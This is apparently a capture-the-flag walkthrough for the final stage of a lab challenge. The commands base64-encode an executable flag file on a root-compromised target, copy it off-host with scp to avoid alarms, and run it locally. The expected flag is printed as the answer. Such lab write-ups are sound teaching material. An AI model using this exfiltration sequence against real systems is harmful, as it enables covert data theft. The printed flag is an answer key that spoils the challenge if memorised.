The Iron Shell - TOKEN4

Base URL: http://target:8000

Background

The final task is to exfiltrate a sensitive executable (flag.txt) without tripping alarms. To avoid running it on the target, base64 it, copy it off-host, then execute locally to reveal the token.

From Nothing to Working

Start point: root access is already available from the previous step.

Iterations:

1. Locate the sensitive file (flag.txt) and note it is executable (rwx------).
2. Base64-encode it to avoid executing it on the target.
3. scp the encoded blob, decode locally, then run the binary to print the token.

Goal

Safely exfiltrate the sensitive file and run it off-host to obtain the token.

Commands

On target (as root):

ls -l flag.txt
base64 flag.txt > /tmp/flag.txt.b64

Copy off-host and decode locally:

scp root@target:/tmp/flag.txt.b64 .
base64 -d flag.txt.b64 > flag.txt
chmod +x flag.txt
./flag.txt

Expected Output

Look for:

PCCC{flag4_17_0727}

Learn More

• https://owasp.org/Top10/A02_2021-Cryptographic_Failures/
• https://cwe.mitre.org/data/definitions/200.html